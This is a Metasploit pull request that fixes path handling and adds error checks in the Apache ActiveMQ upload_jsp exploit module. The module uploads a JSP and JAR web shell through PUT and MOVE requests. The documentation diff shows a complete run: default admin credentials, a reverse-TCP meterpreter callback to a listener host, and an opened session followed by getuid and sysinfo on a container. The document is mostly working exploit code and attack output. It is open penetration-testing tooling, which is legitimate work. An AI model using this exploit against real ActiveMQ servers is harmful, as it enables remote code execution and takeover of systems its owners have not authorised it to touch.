### PR TITLE
Update apache_activemq_upload_jsp.rb to fix missing checks and add missing slashes to some requests

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
+++ b/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
@@ -99,19 +99,57 @@ fails, attempt `/admin/`)
 $ msfconsole -q
 msf6 > use multi/http/apache_activemq_upload_jsp
 [*] Using configured payload java/meterpreter/reverse_tcp
-msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.17.0.1
-LHOST => 172.17.0.1
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
 msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
 RHOST => 127.0.0.1
-msf6 exploit(multi/http/apache_activemq_upload_jsp) > run
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options
 
-[*] Started reverse TCP handler on 172.17.0.1:4444
-[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jar
-[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
-[*] Sending stage (58110 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:45634) at 2021-03-14 18:25:38 -0400
-[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jar
-[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
+Module options (exploit/multi/http/apache_activemq_upload_jsp):
 
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   AutoCleanup    true             no        Remove web shells after callback is received
+   BasicAuthPass  admin            yes       The password for the specified username
+   BasicAuthUser  admin            yes       The username to authenticate as
+   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT          8161             yes       The target port (TCP)
+   SSL            false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                           no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > exploit
+
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
+[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
+[*] Sending stage (58082 bytes) to 172.18.0.2
+[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
+[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
+[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:52620) at 2021-06-14 14:55:52 -0500
+
+meterpreter > getuid
+Server username: activemq
+meterpreter > sysinfo
+Computer    : e0acc262f573
+OS          : Linux 5.8.0-55-generic (amd64)
+Meterpreter : java/linux
 meterpreter >
 ```

--- a/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
+++ b/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
@@ -91,10 +91,10 @@ class MetasploitModule < Msf::Exploit::Remote
     ['.jar', '.jsp'].each do |ext|
       file_name = payload_name + ext
       data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
-      move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
+      move_headers = { 'Destination' => "#{@url}/#{path}/#{file_name}" }
       upload_uri = normalize_uri('fileserver', file_name)
       print_status("Uploading #{move_headers['Destination']}")
-      register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
+      register_files_for_cleanup "#{path}/#{file_name}" if datastore['AutoCleanup'].casecmp('true')
       return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
                               send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
       @trigger_resource = /webapps(.*)/.match(path)[1]
@@ -110,7 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_install_path
-    properties_page = send_request('GET', "#{@url}/admin/test/").body
+    properties_page = send_request('GET', "#{@url}/admin/test/")
+    fail_with(Failure::UnexpectedReply, 'Target did not respond with 200 OK to a request to /admin/test/!') if properties_page == false
+    properties_page = properties_page.body
     match = properties_page.match(/activemq\.home=([^,}]+)/)
     return match[1] unless match.nil?
   end
@@ -125,7 +127,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'     => uri
       }.merge(opts)
     )
-    return false if r.nil? || expected_response != r.code.to_i
+    if r.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target!')
+    end
+    return false if expected_response != r.code.to_i
     r
   end
 

--- a/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
+++ b/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ['.jar', '.jsp'].each do |ext|
       file_name = payload_name + ext
       data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
-      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
+      move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
       upload_uri = normalize_uri('fileserver', file_name)
       print_status("Uploading #{move_headers['Destination']}")
       register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')


### PR DESCRIPTION
Fixes #15338

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
The issue number is in relation to #15338. Corrected a minor error where the URI and filesystem path were not separated.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/apache_activemq_upload_jsp`
- [x] Set the required parameters
- [x] Run - should be successful on a vulnerable target, and the path should print correctly as shown: `http://host:port/C:\apache-activemq-5.11.1\bin\win64\..\../webapps/api/TUybAWNAXX.jar` where host is rhost, and port is rport. 

![image](https://user-images.githubusercontent.com/28553937/121797951-5b20ed80-cc1b-11eb-9847-40f164baf085.png)
